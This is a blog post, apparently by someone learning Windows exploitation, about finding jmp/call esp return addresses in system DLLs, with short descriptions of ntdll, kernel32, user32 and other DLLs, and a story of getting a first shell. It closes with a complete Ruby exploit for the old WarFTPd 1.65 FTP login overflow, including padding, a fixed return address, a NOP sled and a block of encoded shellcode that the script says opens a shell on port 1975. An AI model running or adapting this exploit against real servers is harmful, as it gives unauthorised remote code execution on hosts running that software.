Finding the right return was for me one of the most difficult aspects of getting my overflows to work on win32. The examples in books like the shell coders handbook and The Art of Hacking were linux based and old for that matter. The examples didn’t take into account safe guards imposed by the OS. When starting out it was vexing to say the least.

My first successful Windows exploit was warftpd 1.65. It was straight forward and after I fixed a minor type-o in my code that was causing me to underrun the buffer, but overflow it later having the exception thrown somewhere in the middle of my shellcode I got it! It was late at night and I think I woke up my wife when I yelled in excitement.

The return I used was a jmp esp that I found in kernel32.dll, I found the address using findjmp which was written by Ryan Permeh from Eeye. Findjmp finds useful jump points in a dll.

A week later my co worker sent me some exploit code an activex overflow in bearshare. He was out doing a Vulnerability Assessment when the advisory came out. He noticed though that the offset and returns for xpsp2 and xpsp2 (vmware) were different so he sent it out to me and asked if I could get a quick return and check the offset for him. It took me a few minutes (mainly cause I did not have the binary for findjmp and had to find a visual C 6 compiler. This time I returned using a call esp, again into kernel32.dll.

Both times I have returned into kernel32.dll and it made me start to wonder, what’s the difference between all the .dll’s and is there any significant advantage to using one over the other. After asking my co worker the answer I received was in short No, its just dependent on if you can find the instruction you need and successfully call your shellcode. This still made me want to go out and discover more about which dll’s did what. So I set about to findout, but could not find a central definition of the most popular. So here is a run down:

These are the most popular dll’s people tend to return to, they are also the ones outlined in the MSF opcode DB. Per the MSF Wiki “Buffer Overflow exploits on windows often require precise knowledge of the position of certain machine language opcodes in the attacked program or included DLL’s. Here is what the DLL’s do:

Ntdll.dll – The ntdll has a description of “NT Layer DLL” and contains NT kernel functions. It can be located in the %systemroot%\system32, or I386 directory.

Kernel32.dll – Handles memory management, input/output operations, and interrupts. Kernel32.dll is loaded into a protected memory space so other applications do not take that space over.

User32.dll – Handles Windows functions related to user interface (window handling, basic UI, and so forth)

Gdi32.dll – gdi32.dll contains functions for the Windows GDI (Graphical Device Interface) which assists windows in creating simple 2-dimensional objects.

Ws2_32.dll – File that contains the Windows Sockets API used by most Internet and network applications to handle network connections.

Ws2help.dll – File that contains the functions used by the Windows Sockets API, which is used by Internet and network applications.

For more information on DLL’s, visit DLL Wikipedia

Last night I spent hours on this bloody warftpd vuln. It’s by no means new, I think it’s been out since 1995 and I’ve seen advisories for it as far back 1998 for sure. Anyhow, it was the first win32 overflow I’ve worked on. I’ve played with the linux stuff, the stupid examples in the shellcoders handbook and all that but win32 is a different world. After hours of working on the bug, I finally went to sleep feeling somewhat defeated and wondering if I would look at it again. I talked to a co worker of mine this morning and he knocked out the exploit in about 20 minutes. He didn’t do the same one I was working on though. Warftpd 1.65 has two way’s to exploit and he chose writing over the SEH.

Today I got home, and started hitting it again. Within about 10 minutes I had a shell. At first I lost it, because I was in awe at my accomplishment. The code is shitty, the return is shitty. If I exit my shell the process crashes, I have to have telnet ready to go before exploiting. But ya know what, I got it! I guess after a few more swacks at a few more programs I can begin to work on my optimization skills. I guess for know though, I will just continue hitting it up!

I have to say though. The surge that went through my body felt like heroine hitting the veins. Not that I know what that feels like, I assure you I don’t. But from what I hear, it’s pretty good!

I wrote it in ruby, and it’s really bad! but it works, and I’m just glad I finally figured out basic win32 exploitation!

#!/usr/bin/env ruby

require ‘net/ftp’

host = ARGV[0]
port = ARGV[1] || 21

shell = “\x2b\xc9\xba\x46\xb7\x73\xc2\xdb\xd1\xd9\x74\x24\xf4\x58″
shell << “\xb1\x50\x83\xe8\xfc\x31\x50\x0e\x03\x50\x0e\xa4\x42\x8f”
shell << “\xa8\xc3\xe0\x98\xd4\xec\x04\xa7\x47\x99\x97\x7c\xac\x16″
shell << “\x22\x41\x27\x54\xa8\xc1\x36\x4b\x39\x7e\x21\x18\x61\xa1″
shell << “\x50\xf5\xd7\x2a\x66\x82\xe9\xc2\xb6\x54\x70\xb6\x3d\x94″
shell << “\xf7\xc0\xfc\xde\xf5\xcf\x3c\x35\xf1\xeb\x94\xed\xd2\x7e”
shell << “\xf0\x66\x7d\xa5\xfb\x93\xe4\x2e\xf7\x28\x62\x6f\x14\xaf”
shell << “\x9f\x93\x08\x24\xd6\xf8\x74\x26\x88\xc3\x44\x8d\x2e\x4f”
shell << “\xe5\x01\x24\x0f\xe6\xea\x4a\x8c\x5b\x67\xea\xa4\xfd\x1f”
shell << “\x65\xfa\x0f\x33\x29\xfc\xc6\xad\x99\x64\x8f\x02\x2c\x01″
shell << “\x38\x17\x62\x8e\x92\x28\x52\x58\xd0\x3b\xaf\xa2\xb6\x3c”
shell << “\x86\x8a\xbf\x27\x41\xb4\x2d\xaf\x8c\xe3\xc7\xad\x6f\xdb”
shell << “\x70\x68\x86\x29\x2d\xdd\x66\x07\x7d\xb2\xcb\xfb\xd1\x77″
shell << “\xbf\xb8\x86\x88\xef\x59\x41\x71\xa7\xc0\xc2\xf4\x26\x99″
shell << “\x8d\xa2\xb3\xd2\x8a\xfd\x3c\xc4\x7f\x11\x92\xbc\x80\xc1″
shell << “\x7c\x9b\xd2\xcf\x95\xb4\xd3\xd9\x35\x6e\xd3\x35\xd1\x75″
shell << “\x62\x33\x6b\x21\x8a\xed\x3c\x99\x20\x44\x42\xf1\x5a\x0e”
shell << “\x5b\x8b\x9a\xb7\xf4\x93\xf5\x12\x04\xbb\x9c\xf6\x9e\x5a”
shell << “\x09\x65\x32\x2a\x2c\x03\x9c\x75\x86\x1f\x95\x61\xb2\xdb”
shell << “\x2f\x8f\x72\x23\xdc\xfa\x8b\xe1\x0e\x05\x31\xc9\xc3\x74″
shell << “\xcc\x29\x4f\x2d\x9a\x21\xfd\xcc\x6e\xa7\xfe\x44\xd5\x38″
shell << “\xd6\xfc\x82\x94\x86\x53\x7c\x72\x28\x05\x2f\xd7\x7b\x5a”
shell << “\x1f\xbf\xd6\x7d\xa5\xf1\x7a\x81\x70\x67\x82\x82\x4a\x88″
shell << “\xac\xf6\xe2\x8a\xce\xcd\x69\x8d\x07\x9f\x8e\xa1\xc0\x5e”
shell << “\xa9\xa3\x62\xcc\xb6\xf5\x7a\x22\x42″

user = “A” * 485
ret = ret = “\x63\x37\x57\x7C”
nop = “\x90″ * 32

buf = user + ret + nop + shell

puts (“[*] Attempting target #{host}”)
ftp = Net::FTP.new(host)
ftp.login(buf, passwd=”TEST”)

puts “++ Connect to client on port 1975….\n”

ftp.close